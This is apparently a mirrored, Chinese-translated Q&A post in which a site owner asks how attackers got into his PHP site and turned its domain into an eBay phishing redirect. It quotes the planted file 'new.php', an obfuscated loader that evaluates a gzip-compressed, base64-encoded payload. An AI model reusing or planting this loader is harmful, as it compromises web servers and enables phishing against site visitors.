gpt4 book ai didi

php - 我的 PHP 代码中的漏洞是什么?

转载 作者:可可西里 更新时间:2023-10-31 23:57:39 24 4
gpt4 key购买 nike

<分区>

我的一个网站最近被黑了。虽然实际网站保持不变,但他们能够以某种方式使用该域创建一个重定向到 ebay 网络钓鱼诈骗的链接。

由于显而易见的原因,我已经关闭了该网站,所以我无法链接到代码。我想知道如何找出他们使用的漏洞,以便将来避免这个问题。该页面使用了 PHP,还有一些 javascript(用于表单验证)。

是否有免费服务可以扫描我的代码以查找漏洞?我还有哪些其他选择?

谢谢,杰夫

编辑:我已将文件托管在 [link removed]

需要注意的几件事:“funcs”文件夹中有几个文件,其中大部分未被使用,但我将它们留在那里以防万一。 “数据”文件夹中的“new.php”(下面的内容)显然是问题所在。最大的问题是,有人是如何设法将“new.php”上传到服务器的?还有我收到的电子邮件的 RTF,其中包含有关该骗局的信息。

(注意:此代码可能对您的计算机“有害”)

    <?php
$prv=strrev('edoced_46esab');
$vrp=strrev('etalfnizg');
eval($vrp($prv("rVPRbpswFNW0P9jbNE1ChojQSDD7cm0syvoB5A/GxhiBJVoKxJC0pFr667v0pe1L2k17snyvz/G559jOLxCVxjGCfEBYc1noQfE8VL0SpUYTwQah43LQueKbh3IeQYlguBx1p/gQqkqJFUKiPsWO0Vgh9LoN1R4EoUsuq7xU3Cgxgug0DhHQiVVOjVavFK9ClbDjKH2ZLgOrbpoA0RbNj/dv3r77KF3ED237vVlkrH9Wu7srzM1uv7t3h942N5mTsYM7O52s0y5jsz3thntz6gvCPiWcEVubLpO0tme+VxdHGdq3xe90WU+0wg+hQREGEi9c9G18gprOBPPZBWTMfixP1YwFdlMcNw9UVInT5XjLYqcHQcOSTxvFGyV+5q3GPcKgOzKHHFUi+Te/YmerBK0Nua/XectlnU+JRDBq7OjWKRJOEE0tSqaKIOkHs62a+StEebFDgR4UL7jc5l0Ea9JBXNiSDD3F5bpx3Zq5syaIpudx0FiAuI7gwGVPCpW4TugtnGlf/v0EZ/kWC+8F0ZafWOXazFuzeo0JX87d9tWzvlnOf/s4Xlwdiu2cXX1m/gtT+OzyinnxHw==")));
?>

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com